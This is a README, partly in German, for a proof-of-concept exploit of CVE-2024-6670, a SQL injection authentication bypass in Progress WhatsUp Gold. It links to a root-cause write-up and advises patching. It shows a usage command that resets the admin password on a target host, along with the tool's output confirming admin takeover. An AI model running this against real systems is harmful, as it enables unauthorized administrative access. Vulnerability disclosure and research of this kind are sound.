
Proof-of-Concept-Exploit für Progress WhatsUp Gold SQL-Injection-Authentifizierungsumgehung (CVE-2024-6670). Enthält Ursachenanalyse und automatisiertes Zurücksetzen des Passworts, um Adminzugriff zu erlangen.
PoC für die Progress Software WhatsUp Gold HasErrors SQL Injection Authentication Bypass Schwachstelle (CVE-2024-6670)
Eine Root-Cause-Analyse der Schwachstelle finden Sie in meinem Blog:
https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/
python CVE-2024-6670.py --newpassword Pwned --target-url https://192.168.201.150
_______ _ _ _______ _______ _____ __ _ _____ __ _ ______ _______ _______ _______ _______
|______ | | | | | | | | | | | \ | | | \ | | ____ | |______ |_____| | | |
______| |_____| | | | | | | |_____| | \_| __|__ | \_| |_____| . | |______ | | | | |
(*) Progress Software WhatsUp Gold HasErrors SQL Injection Authentication Bypass Vulnerability (CVE-2024-6670)
(*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam), shoutout to @indishell1046
(*) Technical details: https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/
[^_^] Starting the exploit...
[*] Used remote primitive to encrypt our passowrd
[*] encrypted password extracted -> 0x03000000100000000EABC7F4B1C8263DADB17E4BED835C0F
[+] Exploit finished, you can now login using the username -> admin and password -> Pwned
Aktualisieren Sie auf die neueste Version oder ergreifen Sie Gegenmaßnahmen gemäß den Anweisungen im Progress Advisory
Ohne die Motivation und die Lektionen, die mir mein lieber Freund Manish in all den Jahren, die ich ihn kenne, beigebracht hat, wäre ich nicht in der Lage gewesen, diesen Fehler auszunutzen. Danke, mein Freund.
Diese Software wurde ausschließlich für akademische Forschungszwecke und zur Entwicklung effektiver Abwehrtechniken erstellt und ist nicht dazu gedacht, Systeme anzugreifen, es sei denn, dies wurde ausdrücklich genehmigt. Die Projektverantwortlichen sind nicht verantwortlich oder haftbar für Missbrauch der Software. Verwenden Sie sie verantwortungsbewusst.